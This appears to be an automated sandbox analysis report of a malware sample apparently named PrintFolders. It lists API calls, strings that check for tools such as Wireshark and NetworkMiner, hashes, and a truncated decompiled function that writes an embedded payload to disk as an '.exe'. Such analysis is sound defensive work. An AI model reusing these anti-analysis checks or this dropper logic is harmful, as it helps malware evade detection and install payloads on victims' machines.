0x00000000
0x00405c9f
0x00405c9f
0x00405cb2
0x00405cb8
0x00405cbe
0x00405cc1
0x00405cc1
0x00405cc3
0x00405cc4
0x00405cd8
0x00405ce9
0x00405cee
0x00405cf3
0x00405cf9
0x00405d00
0x00405d0c
0x00405d11
0x00405d16
0x00000000
0x00000000
0x00405d28
0x00405d2d
0x00405d32
0x00405d44
0x00405d49
0x00405d4e
0x00405d60
0x00405d65
0x00405d6a
0x00405d70
0x00405d76
0x00405d80
0x00405d80
0x00405d82
0x00405d83
0x00405d87
0x00405d89
0x00405d8d
0x00405d90
0x00405d9e
0x00405da5
0x00405da8
0x00405da9
0x00405d90
0x00405db9
0x00405dbe
0x00405dc3
0x00405dd1
0x00405dd6
0x00405ddb
0x00405de2
0x00405de4
0x00405df7
0x00405dfd
0x00405e03
0x00405e06
0x00405e06
0x00405e08
0x00405e09
0x00405e1d
0x00405e2e
0x00405e33
0x00405e38
0x00000000
0x00000000
0x00405e38
0x00405ddb
0x00405dc3
0x00405d6a
0x00405d4e
0x00000000
0x00405d32
0x00405d00
0x00405e3e
0x00405e3e
0x00405e47
0x00000000
0x00405e49
0x00405e49
0x00405e4f
0x00405e50
0x00405e58
0x00405e6a
0x00405e6a
0x00405e6c
0x00000000
0x00405e5a
0x00405e5a
0x00405e5d
0x00405e68
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e68
0x00405e58
0x00405e47
0x00405c68
0x00405c68
0x00405c6e
0x00405c6f
0x00405c77
0x00405c8d
0x00405c8d
0x00405c8f
0x00405c94
0x00000000
0x00405c79
0x00405c79
0x00405c7c
0x00405c87
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c87
0x00405c77
0x00405c2a
0x00405c2a
0x00405c30
0x00405c31
0x00405c39
0x00405c4f
0x00405c4f
0x00405c51
0x00405c56
0x00000000
0x00405c3b
0x00405c3b
0x00405c3e
0x00405c49
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c49
0x00405c39
0x00405c28
0x00405a68
0x00405a68
0x00405a6e
0x00405a6f
0x00405a77
0x00405a8d
0x00405a8d
0x00405a8f
0x00405a94
0x00000000
0x00405a79
0x00405a79
0x00405a7c
0x00405a87
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a87
0x00405a77
0x00405a2a
0x00405a2a
0x00405a30
0x00405a31
0x00405a39
0x00405a4f
0x00405a4f
0x00405a51
0x00405a56
0x00000000
0x00405a3b
0x00405a3b
0x00405a3e
0x00405a49
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a49
0x00405a39
0x00405a28
0x004058a8
0x004058a8
0x004058ae
0x004058af
0x004058b7
0x004058cd
0x004058cd
0x004058cf
0x004058d4
0x00000000
0x004058b9
0x004058b9
0x004058bc
0x004058c7
0x00000000
0x00000000
0x00000000
0x00000000
0x004058c7
0x004058b7
0x0040586a
0x0040586a
0x00405870
0x00405871
0x00405879
0x0040588f
0x0040588f
0x00405891
0x00405896
0x00000000
0x0040587b
0x0040587b
0x0040587e
0x00405889
0x00405e94
0x00405e94
0x00405e99
0x00405e9a
0x00405e9b
0x00405e9c
0x00405e9d
0x00405e9e
0x00405e9f
0x00405ea0
0x00405ea1
0x00405ea3
0x00405ea4
0x00405ea8
0x00405eaa
0x00405eab
0x00405eac
0x00405ead
0x00405eaf
0x00405eb1
0x00405eb1
0x00405eb3
0x00405eb7
0x00405eb9
0x00405eb9
0x00405ebb
0x00405ebe
0x00405ec1
0x00405ec5
0x00405ecb
0x00405ed0
0x00405ed2
0x00405ed5
0x00405ed8
0x00405f0a
0x00405f10
0x00405eda
0x00405eda
0x00405edc
0x00405f11
0x00405f16
0x00405f17
0x00405f18
0x00405f19
0x00405f1a
0x00405f1b
0x00405f1c
0x00405f1d
0x00405f1e
0x00405f1f
0x00405f20
0x00405f21
0x00405f22
0x00405f23
0x00405f24
0x00405f25
0x00405f26
0x00405f27
0x00405f28
0x00405f29
0x00405f2a
0x00405f2b
0x00405f2c
0x00405f2d
0x00405f2e
0x00405f2f
0x00405f30
0x00405f31
0x00405f32
0x00405f33
0x00405f34
0x00405f35
0x00405f36
0x00405f37
0x00405f38
0x00405f39
0x00405f3a
0x00405f3b
0x00405f3c
0x00405f3d
0x00405f3e
0x00405f3f
0x00405f40
0x00405f41
0x00405f43
0x00405f45
0x00405f50
0x00405f51
0x00405f57
0x00405f5c
0x00405f5e
0x00405f61
0x00405f62
0x00405f63
0x00405f64
0x00405f68
0x00405f6e
0x00405f7e
0x00405f88
0x00405f92
0x00405f94
0x00405f99
0x00405f9f
0x00405fa6
0x00405fab
0x00405fae
0x00405fb5
0x00405fb7
0x00405fbd
0x00405fc8
0x00405fcd
0x00405fd3
0x00405fe0
0x00405fe5
0x00405fe5
0x00405fb5
0x00405fe8
0x00405fed
0x00405fef
0x00405ff1
0x00405ff8
0x00405fff
0x00406006
0x0040600d
0x00406014
0x0040601b
0x00406022
0x00406022
0x00406024
0x00406024
0x00406029
0x0040602c
0x00406031
0x00406033
0x00406033
0x00406036
0x0040603c
0x00406043
0x0040604a
0x00406050
0x00406050
0x00406052
0x00406053
0x00406053
0x00406061
0x00406066
0x0040606b
0x0040606e
0x00406070
0x004065ae
0x004065ae
0x00000000
0x00406076
0x00406076
0x0040607b
0x00406085
0x0040608f
0x00406095
0x0040609c
0x004060a1
0x004060a4
0x004060ab
0x004060ad
0x004060b3
0x004060be
0x004060c3
0x004060c9
0x004060d6
0x004060db
0x004060db
0x004060ab
0x004060de
0x004060e3
0x004060e5
0x004060e7
0x004060ee
0x004060f5
0x004060fc
0x00406103
0x0040610a
0x00406111
0x00406118
0x00406118
0x0040611a
0x0040611a
0x0040611f
0x00406122
0x00406127
0x00406129
0x00406129
0x0040612c
0x00406132
0x00406139
0x00406140
0x00406140
0x00406142
0x00406143
0x00406143
0x0040614f
0x00406151
0x00406156
0x0040615b
0x0040615e
0x00406160
0x00000000
0x00406166
0x00406166
0x0040616b
0x00406175
0x0040617f
0x00406188
0x0040618e
0x00406195
0x0040619a
0x0040619d
0x004061a4
0x004061a6
0x004061ba
0x004061c2
0x004061c8
0x004061d5
0x004061da
0x004061da
0x004061a4
0x004061dd
0x004061e2
0x004061e4
0x004061e6
0x004061ed
0x004061f4
0x004061fb
0x00406202
0x00406209
0x00406210
0x00406217
0x0040621e
0x00406225
0x00406225
0x00406227
0x00406227
0x0040622c
0x0040622f
0x00406234
0x00406236
0x00406236
0x00406239
0x0040623f
0x00406246
0x00406250
0x00406250
0x00406252
0x00406253
0x00406253
0x00406261
0x00406266
0x0040626b
0x0040626e
0x00406270
0x00000000
0x00406276
0x00406276
0x0040627c
0x0040627e
0x004065aa
0x004065aa
0x00000000
0x00406284
0x00406291
0x00406297
0x0040629e
0x004062a8
0x004062b2
0x004062bc
0x004062c5
0x004062cb
0x004062d2
0x004062d7
0x004062da
0x004062e1
0x004062e3
0x004062e9
0x004062f1
0x004062f6
0x00406302
0x0040630a
0x00406310
0x00406316
0x00406323
0x00406328
0x00406328
0x004062e1
0x0040632b
0x00406332
0x00406334
0x00406334
0x00406336
0x00406336
0x0040633c
0x0040633d
0x0040633d
0x00406336
0x00406342
0x00406347
0x00406351
0x0040635b
0x00406365
0x0040636c
0x0040636c
0x00406370
0x00406370
0x00406372
0x00406373
0x00406373
0x00406385
0x0040638a
0x00406397
0x0040639e
0x004063a3
0x004063a9
0x004063b8
0x004063bd
0x004063c0
0x004063c2
0x00406502
0x00406502
0x004063c8
0x004063c8
0x004063cd
0x004063d7
0x004063e1
0x004063ea
0x004063f0
0x004063f7
0x004063fc
0x004063ff
0x00406406
0x00406408
0x00406410
0x0040641c
0x00406424
0x0040642a
0x00406437
0x0040643c
0x0040643c
0x00406406
0x0040643f
0x00406444
0x00406446
0x00406448
0x0040644f
0x00406456
0x0040645d
0x00406464
0x0040646b
0x00406472
0x00406479
0x00406480
0x00406487
0x00406487
0x00406489
0x00406489
0x0040648e
0x00406493
0x0040649d
0x004064a7
0x004064b1
0x004064b1
0x004064b4
0x004064b4
0x004064b6
0x004064b7
0x004064b7
0x004064c9
0x004064ce
0x004064db
0x004064e0
0x004064ef
0x004064f4
0x004064f7
0x004064fe
0x00406500
0x00000000
0x00000000
0x00406500
0x00406509
0x0040650c
0x00406566
0x00406566
0x00406569
0x004065a1
0x004065a1
0x004065a8
0x00000000
0x00000000
0x00000000
0x00000000
0x004065b0
0x004065b3
0x004065bb
0x004065bc
0x004065bd
0x004065c1
0x004065cb
0x0040656b
0x0040656b
0x00406571
0x00406574
0x00000000
0x00406576
0x00406576
0x0040657c
0x0040657d
0x0040657f
0x00406585
0x00406597
0x00406597
0x00406599
0x00000000
0x00406587
0x00406587
0x0040658a
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406595
0x00406585
0x00406574
0x0040650e
0x0040650e
0x00406514
0x00406517
0x0040651a
0x0040654b
0x0040654b
0x00406555
0x0040655f
0x00000000
0x0040651c
0x0040651c
0x00406522
0x00406523
0x00406525
0x0040652b
0x00406541
0x00406541
0x00406543
0x00406548
0x00000000
0x0040652d
0x0040652d
0x00406530
0x00406538
0x0040653b
0x004065cc
0x004065cc
0x004065d1
0x004065d2
0x004065d3
0x004065d4
0x004065d5
0x004065d6
0x004065d7
0x004065d8
0x004065d9
0x004065da
0x004065db
0x004065dc
0x004065dd
0x004065de
0x004065df
0x004065e0
0x004065e1
0x004065e6
0x004065ed
0x004065f3
0x004065fd
0x0040660a
0x00406610
0x00406612
0x00406636
0x0040663b
0x00406645
0x00406614
0x00406623
0x00406629
0x0040662c
0x0040662e
0x00406646
0x00406666
0x0040666c
0x0040666e
0x00000000
0x00406670
0x00406677
0x00406682
0x0040668d
0x0040668f
0x00406698
0x00406698
0x00406630
0x00406630
0x00000000
0x00406630
0x0040662e
0x00000000
0x00000000
0x00000000
0x0040653b
0x0040652b
0x0040651a
0x0040650c
0x0040627e
0x00406270
0x00406160
0x00405ede
0x00405ee0
0x00405ee2
0x00405ee4
0x00405ee7
0x00405eeb
0x00405eed
0x00405eed
0x00405ef5
0x00405ef7
0x00405efb
0x00405f02
0x00000000
0x00405f07
0x00405edc
0x00000000
0x00000000
0x00000000
0x00405889
0x00405879
0x004057c7
0x004057c7
0x004057c9
0x004057cc
0x00000000
0x004057ce
0x004057dc
0x004057e1
0x004057e7
0x004057eb
0x004057f8
0x00405803
0x00405805
0x0040580b
0x00405815
0x0040581f
0x00405822
0x00405822
0x00000000

APIs

__Init_thread_footer.LIBCMT ref: 0040575F

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

__Init_thread_footer.LIBCMT ref: 0040592E
GetUserNameA.ADVAPI32(?,}FOF@.), ref: 004059C6
GetUserNameA.ADVAPI32(?,OJCG@.), ref: 00405803

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 00405B0B
GetUserNameA.ADVAPI32(?,lK@MF.), ref: 00405BC6
GetForegroundWindow.USER32(?,?), ref: 00405C9F
GetWindowTextA.USER32 ref: 00405CB2
Sleep.KERNEL32(00000258), ref: 00405DE2
GetForegroundWindow.USER32 ref: 00405DE4
GetWindowTextA.USER32 ref: 00405DF7

Strings

OJCG@., xrefs: 00405738
dbg, xrefs: 00405DB3
ZK]Z, xrefs: 00405AA4
NetworkMiner, xrefs: 00405D5A
Far , xrefs: 00405CE3, 00405E28
debug, xrefs: 00405DCB
roxifier, xrefs: 00405D06
HTTP Analyzer, xrefs: 00405D22
Wireshark, xrefs: 00405D3E

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CriticalSectionWindow$Init_thread_footerNameUser$EnterForegroundLeaveText$ConditionSleepVariableWake
String ID: Far $HTTP Analyzer$NetworkMiner$OJCG@.$Wireshark$ZK]Z$dbg$debug$roxifier
API String ID: 3399126515-619935782
Opcode ID: 31dd46c91be120cfb9063c524cf2d76983dc327de586dcfc4b038ca48fcf9a12
Instruction ID: 074b258c6d59ddac17b90d1b3a787091faffede02681fa5b6702e06cb24e023a
Opcode Fuzzy Hash: 31dd46c91be120cfb9063c524cf2d76983dc327de586dcfc4b038ca48fcf9a12
Instruction Fuzzy Hash: 2F1225719002988ADB29DF24DC49BDE7B74EB46308F1041FAD448672D2DB7D9B89CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00406800 Relevance: 26.1, APIs: 8, Strings: 6, Instructions: 1614
sleepCOMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00406800(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char* _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v29;
				char _v32;
				char _v33;
				signed int _v36;
				long _v40;
				signed int _v44;
				char _v60;
				long _v64;
				struct _SECURITY_ATTRIBUTES* _v68;
				char _v84;
				long _v88;
				struct _SECURITY_ATTRIBUTES* _v92;
				char _v108;
				char _v116;
				intOrPtr _v128;
				struct _SECURITY_ATTRIBUTES* _v136;
				char _v144;
				signed int _v152;
				char _v312;
				signed char _v316;
				struct _SECURITY_ATTRIBUTES* _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				struct _SECURITY_ATTRIBUTES* _v336;
				long _v340;
				struct _SECURITY_ATTRIBUTES* _v344;
				char _v360;
				long _v364;
				struct _SECURITY_ATTRIBUTES* _v368;
				char _v384;
				long _v388;
				char _v408;
				char _v412;
				char _v413;
				struct _SECURITY_ATTRIBUTES* _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				struct _SECURITY_ATTRIBUTES* _v440;
				struct _SECURITY_ATTRIBUTES* _v444;
				struct _SECURITY_ATTRIBUTES* _v448;
				struct _SECURITY_ATTRIBUTES* _v464;
				long _v468;
				struct _SECURITY_ATTRIBUTES* _v472;
				char _v488;
				long _v496;
				struct _SECURITY_ATTRIBUTES* _v500;
				struct _SECURITY_ATTRIBUTES* _v516;
				long _v520;
				struct _SECURITY_ATTRIBUTES* _v616;
				char _v624;
				signed int _v628;
				char _v772;
				char _v1100;
				signed char _v1104;
				intOrPtr _v1108;
				signed int _v1112;
				intOrPtr _v1116;
				char _v1140;
				char _v1164;
				char _v1188;
				char _v1212;
				char _v1236;
				char _v1260;
				char _v1284;
				signed int _v1892;
				short _v1896;
				intOrPtr _v1900;
				intOrPtr _v1904;
				intOrPtr _v1908;
				void* __ebp;
				signed int _t854;
				int _t859;
				void* _t860;
				char* _t861;
				void* _t867;
				long _t869;
				signed int _t875;
				signed int _t876;
				signed int _t878;
				signed int _t880;
				intOrPtr _t884;
				signed char _t885;
				signed int _t886;
				char* _t890;
				void* _t892;
				signed int _t898;
				intOrPtr _t899;
				signed int _t900;
				char* _t904;
				void* _t906;
				signed int _t912;
				intOrPtr _t913;
				signed char _t914;
				signed int _t915;
				char* _t919;
				void* _t921;
				signed int _t927;
				void* _t934;
				char* _t935;
				intOrPtr _t942;
				signed int _t949;
				signed int _t950;
				signed int _t952;
				void* _t956;
				void* _t959;
				void* _t961;
				void* _t962;
				void* _t963;
				void* _t964;
				void* _t965;
				void* _t974;
				signed int _t975;
				signed int _t978;
				signed int _t984;
				void* _t990;
				void* _t991;
				signed int _t993;
				void* _t998;
				void* _t1002;
				void* _t1003;
				signed int _t1005;
				signed int _t1009;
				intOrPtr _t1012;
				signed int _t1021;
				void* _t1022;
				signed char _t1025;
				char* _t1029;
				intOrPtr _t1030;
				signed char _t1034;
				signed int _t1037;
				signed int _t1039;
				char _t1043;
				struct _SECURITY_ATTRIBUTES* _t1044;
				struct _SECURITY_ATTRIBUTES* _t1048;
				intOrPtr _t1052;
				signed int _t1059;
				void* _t1064;
				char* _t1065;
				intOrPtr _t1069;
				intOrPtr _t1073;
				intOrPtr _t1077;
				struct _SECURITY_ATTRIBUTES* _t1081;
				intOrPtr _t1085;
				char _t1090;
				struct _SECURITY_ATTRIBUTES* _t1091;
				struct _SECURITY_ATTRIBUTES* _t1095;
				intOrPtr _t1099;
				signed int _t1106;
				void* _t1113;
				char* _t1114;
				intOrPtr _t1118;
				intOrPtr _t1122;
				struct _SECURITY_ATTRIBUTES* _t1126;
				intOrPtr _t1130;
				char _t1135;
				struct _SECURITY_ATTRIBUTES* _t1136;
				struct _SECURITY_ATTRIBUTES* _t1140;
				intOrPtr _t1144;
				signed int _t1156;
				signed int _t1158;
				signed int _t1161;
				void* _t1164;
				void* _t1165;
				signed int _t1171;
				intOrPtr _t1173;
				signed char _t1174;
				signed int _t1175;
				char* _t1179;
				void* _t1181;
				signed int _t1187;
				intOrPtr _t1188;
				signed int _t1189;
				char* _t1193;
				void* _t1195;
				signed int _t1201;
				intOrPtr _t1202;
				signed char _t1203;
				signed int _t1204;
				char* _t1208;
				void* _t1210;
				signed int _t1216;
				intOrPtr _t1217;
				intOrPtr _t1221;
				void* _t1225;
				char* _t1226;
				intOrPtr _t1230;
				intOrPtr _t1234;
				struct _SECURITY_ATTRIBUTES* _t1238;
				intOrPtr _t1242;
				char _t1247;
				struct _SECURITY_ATTRIBUTES* _t1248;
				struct _SECURITY_ATTRIBUTES* _t1252;
				intOrPtr _t1256;
				signed int _t1263;
				void* _t1268;
				char* _t1269;
				intOrPtr _t1273;
				intOrPtr _t1276;
				struct _SECURITY_ATTRIBUTES* _t1280;
				intOrPtr _t1284;
				char _t1289;
				struct _SECURITY_ATTRIBUTES* _t1290;
				struct _SECURITY_ATTRIBUTES* _t1294;
				intOrPtr _t1298;
				signed int _t1305;
				void* _t1312;
				char* _t1313;
				intOrPtr _t1317;
				intOrPtr _t1320;
				struct _SECURITY_ATTRIBUTES* _t1324;
				struct _SECURITY_ATTRIBUTES* _t1328;
				char _t1333;
				struct _SECURITY_ATTRIBUTES* _t1334;
				struct _SECURITY_ATTRIBUTES* _t1338;
				struct _SECURITY_ATTRIBUTES* _t1342;
				void* _t1354;
				char* _t1355;
				intOrPtr _t1359;
				intOrPtr _t1362;
				struct _SECURITY_ATTRIBUTES* _t1366;
				struct _SECURITY_ATTRIBUTES* _t1370;
				char _t1375;
				intOrPtr _t1376;
				struct _SECURITY_ATTRIBUTES* _t1381;
				signed int _t1385;
				intOrPtr _t1387;
				intOrPtr _t1393;
				intOrPtr _t1398;
				intOrPtr _t1402;
				char _t1407;
				void* _t1410;
				void* _t1412;
				void* _t1417;
				char* _t1421;
				long _t1424;
				intOrPtr* _t1428;
				struct _SECURITY_ATTRIBUTES* _t1431;
				void* _t1436;
				intOrPtr* _t1437;
				struct _SECURITY_ATTRIBUTES* _t1440;
				void* _t1445;
				signed char* _t1446;
				struct _SECURITY_ATTRIBUTES* _t1449;
				void* _t1454;
				char* _t1466;
				long _t1517;
				signed int _t1535;
				struct _SECURITY_ATTRIBUTES* _t1537;
				struct _SECURITY_ATTRIBUTES* _t1538;
				char _t1539;
				char* _t1544;
				intOrPtr _t1545;
				char _t1546;
				char _t1547;
				struct _SECURITY_ATTRIBUTES* _t1548;
				char _t1549;
				struct _SECURITY_ATTRIBUTES* _t1550;
				struct _SECURITY_ATTRIBUTES* _t1551;
				char _t1552;
				char* _t1556;
				char _t1557;
				char _t1558;
				struct _SECURITY_ATTRIBUTES* _t1559;
				char _t1560;
				struct _SECURITY_ATTRIBUTES* _t1561;
				struct _SECURITY_ATTRIBUTES* _t1562;
				char _t1563;
				intOrPtr* _t1564;
				signed int _t1565;
				char* _t1569;
				void* _t1575;
				intOrPtr* _t1576;
				struct _SECURITY_ATTRIBUTES* _t1579;
				void* _t1584;
				intOrPtr* _t1585;
				struct _SECURITY_ATTRIBUTES* _t1588;
				void* _t1593;
				signed char* _t1594;
				struct _SECURITY_ATTRIBUTES* _t1597;
				void* _t1602;
				char _t1603;
				char _t1604;
				char* _t1608;
				char _t1609;
				char _t1610;
				struct _SECURITY_ATTRIBUTES* _t1611;
				char _t1612;
				struct _SECURITY_ATTRIBUTES* _t1613;
				struct _SECURITY_ATTRIBUTES* _t1614;
				char _t1615;
				char* _t1620;
				char _t1621;
				struct _SECURITY_ATTRIBUTES* _t1622;
				intOrPtr _t1623;
				struct _SECURITY_ATTRIBUTES* _t1624;
				struct _SECURITY_ATTRIBUTES* _t1625;
				intOrPtr _t1626;
				char* _t1630;
				char _t1631;
				struct _SECURITY_ATTRIBUTES* _t1632;
				struct _SECURITY_ATTRIBUTES* _t1633;
				struct _SECURITY_ATTRIBUTES* _t1634;
				struct _SECURITY_ATTRIBUTES* _t1635;
				struct _SECURITY_ATTRIBUTES* _t1636;
				char* _t1640;
				intOrPtr _t1641;
				struct _SECURITY_ATTRIBUTES* _t1642;
				struct _SECURITY_ATTRIBUTES* _t1643;
				intOrPtr _t1644;
				struct _SECURITY_ATTRIBUTES* _t1645;
				intOrPtr* _t1646;
				intOrPtr _t1648;
				intOrPtr _t1649;
				intOrPtr _t1650;
				intOrPtr _t1651;
				struct _SECURITY_ATTRIBUTES* _t1654;
				long _t1655;
				long _t1656;
				long _t1657;
				long _t1658;
				intOrPtr _t1659;
				char* _t1660;
				void* _t1663;
				struct _SECURITY_ATTRIBUTES* _t1664;
				long _t1666;
				struct _SECURITY_ATTRIBUTES* _t1667;
				struct _SECURITY_ATTRIBUTES* _t1668;
				void* _t1669;
				struct _SECURITY_ATTRIBUTES* _t1670;
				long _t1672;
				struct _SECURITY_ATTRIBUTES* _t1673;
				struct _SECURITY_ATTRIBUTES* _t1674;
				signed char* _t1675;
				struct _SECURITY_ATTRIBUTES* _t1676;
				long _t1678;
				struct _SECURITY_ATTRIBUTES* _t1679;
				struct _SECURITY_ATTRIBUTES* _t1683;
				DWORD* _t1701;
				void* _t1702;
				struct _SECURITY_ATTRIBUTES* _t1705;
				long _t1706;
				struct _SECURITY_ATTRIBUTES* _t1707;
				long _t1708;
				long _t1709;
				void* _t1710;
				void* _t1711;
				DWORD* _t1712;
				void* _t1713;
				DWORD* _t1714;
				void* _t1715;
				struct _SECURITY_ATTRIBUTES* _t1718;
				long _t1719;
				struct _SECURITY_ATTRIBUTES* _t1720;
				long _t1721;
				long _t1722;
				void* _t1723;
				void* _t1724;
				DWORD* _t1725;
				void* _t1726;
				DWORD* _t1727;
				void* _t1728;
				intOrPtr* _t1729;
				struct _SECURITY_ATTRIBUTES* _t1734;
				long _t1735;
				void* _t1736;
				signed char _t1737;
				struct _SECURITY_ATTRIBUTES* _t1739;
				struct _SECURITY_ATTRIBUTES* _t1740;
				signed char _t1741;
				void* _t1742;
				struct _SECURITY_ATTRIBUTES* _t1743;
				long _t1745;
				struct _SECURITY_ATTRIBUTES* _t1746;
				struct _SECURITY_ATTRIBUTES* _t1747;
				signed char* _t1748;
				struct _SECURITY_ATTRIBUTES* _t1749;
				long _t1751;
				struct _SECURITY_ATTRIBUTES* _t1752;
				struct _SECURITY_ATTRIBUTES* _t1753;
				long _t1754;
				void* _t1755;
				struct _SECURITY_ATTRIBUTES* _t1758;
				long _t1759;
				struct _SECURITY_ATTRIBUTES* _t1760;
				long _t1761;
				long _t1762;
				void* _t1763;
				void* _t1764;
				DWORD* _t1765;
				void* _t1766;
				DWORD* _t1767;
				void* _t1768;
				struct _SECURITY_ATTRIBUTES* _t1771;
				long _t1772;
				struct _SECURITY_ATTRIBUTES* _t1773;
				long _t1774;
				long _t1775;
				void* _t1776;
				DWORD* _t1777;
				void* _t1778;
				DWORD* _t1779;
				void* _t1780;
				struct _SECURITY_ATTRIBUTES* _t1783;
				struct _SECURITY_ATTRIBUTES* _t1784;
				struct _SECURITY_ATTRIBUTES* _t1785;
				long _t1786;
				long _t1787;
				void* _t1788;
				DWORD* _t1789;
				DWORD* _t1790;
				DWORD* _t1791;
				DWORD* _t1792;
				struct _SECURITY_ATTRIBUTES* _t1795;
				struct _SECURITY_ATTRIBUTES* _t1796;
				struct _SECURITY_ATTRIBUTES* _t1797;
				long _t1798;
				long _t1799;
				void* _t1800;
				DWORD* _t1801;
				DWORD* _t1802;
				DWORD* _t1803;
				void* _t1804;
				char* _t1805;
				void* _t1806;
				void* _t1807;
				void* _t1808;
				void* _t1809;
				long _t1810;
				void* _t1811;
				void* _t1814;
				long _t1815;
				long _t1817;
				void* _t1818;
				signed int _t1821;
				signed int _t1827;
				signed int _t1830;
				signed int _t1832;
				signed int _t1833;
				void* _t1835;
				signed int _t1838;
				void* _t1839;
				void* _t1840;
				signed int _t1846;
				void* _t1847;
				void* _t1848;
				signed char _t1849;
				void* _t1850;
				void* _t1851;
				void* _t1852;
				signed char _t1853;
				void* _t1854;
				void* _t1855;
				signed int _t1856;
				signed char _t1857;
				void* _t1858;
				void* _t1859;
				void* _t1864;
				void* _t1870;
				void* _t1871;
				signed int _t1872;
				void* _t1878;
				char _t1887;
				void* _t1888;
				void* _t1889;
				signed char _t1890;
				void* _t1891;
				void* _t1892;
				signed char _t1893;
				void* _t1894;
				void* _t1895;
				signed char _t1896;
				void* _t1897;

				_t1814 = __esi;
				_t1809 = __edi;
				_t1417 = __ecx;
				_push(__ebx);
				_t1410 = _t1835;
				_t1838 = (_t1835 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t1410 + 4));
				_t1827 = _t1838;
				_push(0xffffffff);
				_push(0x42c76b);
				_push( *[fs:0x0]);
				_push(_t1410);
				_t1839 = _t1838 - 0x54;
				_push(__esi);
				_t854 =  *0x43d054; // 0x7bd02ead
				_push(_t854 ^ _t1827);
				 *[fs:0x0] =  &_v24;
				_v16 = 1;
				_t858 =  >=  ?  *((void*)(_t1410 + 8)) : _t1410 + 8;
				_t859 = CreateDirectoryA( >=  ?  *((void*)(_t1410 + 8)) : _t1410 + 8, 0); // executed
				if(_t859 != 0 || GetLastError() == 0xb7) {
					_push(_t1417);
					_t860 = E0040C770( &_v108, _t1410 + 8);
					_v16 = 2;
					_t861 = E0040C990( &_v84, _t860, _t1410 + 0x20);
					_t1840 = _t1839 + 8;
					_t1421 = _t861;
					_v16 = 3;
					_t1815 =  *(_t1421 + 0x14);
					_t1654 =  *(_t1421 + 0x10);
					if(_t1815 - _t1654 < 4) {
						_v33 = 0;
						_t1421 = E00402980(_t1410, _t1421, _t1809, _t1815, 4, _v33, ".exe", 4);
					} else {
						 *(_t1421 + 0x10) =  &(_t1654->lpSecurityDescriptor);
						_t1407 = _t1421;
						if(_t1815 >= 0x10) {
							_t1407 =  *_t1421;
						}
						 *((intOrPtr*)(_t1407 + _t1654)) = 0x6578652e;
						 *((char*)(_t1407 +  &(_t1654->lpSecurityDescriptor))) = 0;
					}
					asm("movups xmm0, [ecx]");
					asm("movups [ebp-0x30], xmm0");
					asm("movq xmm0, [ecx+0x10]");
					asm("movq [ebp-0x20], xmm0");
					 *(_t1421 + 0x10) = 0;
					 *(_t1421 + 0x14) = 0xf;
					 *_t1421 = 0;
					_t866 =  >=  ? _v60 :  &_v60;
					_t867 = E00413D5D( >=  ? _v60 :  &_v60, "wb"); // executed
					_t1655 = _v40;
					_t1839 = _t1840 + 8;
					_t1814 = _t867;
					if(_t1655 < 0x10) {
						L11:
						_t1656 = _v64;
						_v44 = 0;
						_v40 = 0xf;
						_v60 = 0;
						if(_t1656 < 0x10) {
							L15:
							_t1657 = _v88;
							_v68 = 0;
							_v64 = 0xf;
							_v84 = 0;
							if(_t1657 < 0x10) {
								L19:
								_v92 = 0;
								_v88 = 0xf;
								_v108 = 0;
								_t1921 = _t1814;
								if(_t1814 == 0) {
									goto L21;
								} else {
									E00418608(_t1410, _t1809, _t1814, 0x43daa0, 1, 0x12000, _t1814); // executed
									_push(_t1814);
									E00413F7D(_t1410, _t1809, _t1814, _t1921);
									_t1839 = _t1839 + 0x14;
									_v29 = 1;
								}
								goto L22;
							} else {
								_t1649 = _v108;
								_t1806 = _t1657 + 1;
								_t1393 = _t1649;
								if(_t1806 < 0x1000) {
									L18:
									_push(_t1806);
									E0040EDFF(_t1649);
									_t1839 = _t1839 + 8;
									goto L19;
								} else {
									_t1424 =  *(_t1649 - 4);
									_t1660 = _t1806 + 0x23;
									if(_t1393 - _t1424 + 0xfffffffc > 0x1f) {
										goto L31;
									} else {
										goto L18;
									}
								}
							}
						} else {
							_t1650 = _v84;
							_t1807 = _t1656 + 1;
							_t1398 = _t1650;
							if(_t1807 < 0x1000) {
								L14:
								_push(_t1807);
								E0040EDFF(_t1650);
								_t1839 = _t1839 + 8;
								goto L15;
							} else {
								_t1424 =  *(_t1650 - 4);
								_t1660 = _t1807 + 0x23;
								if(_t1398 - _t1424 + 0xfffffffc > 0x1f) {
									goto L31;
								} else {
									goto L14;
								}
							}
						}
					} else {
						_t1651 = _v60;
						_t1808 = _t1655 + 1;
						_t1402 = _t1651;
						if(_t1808 < 0x1000) {
							L10:
							_push(_t1808);
							E0040EDFF(_t1651);
							_t1839 = _t1839 + 8;
							goto L11;
						} else {
							_t1424 =  *(_t1651 - 4);
							_t1660 = _t1808 + 0x23;
							if(_t1402 - _t1424 + 0xfffffffc > 0x1f) {
								L31:
								E00413527(_t1410, _t1660, __eflags);
								goto L32;
							} else {
								goto L10;
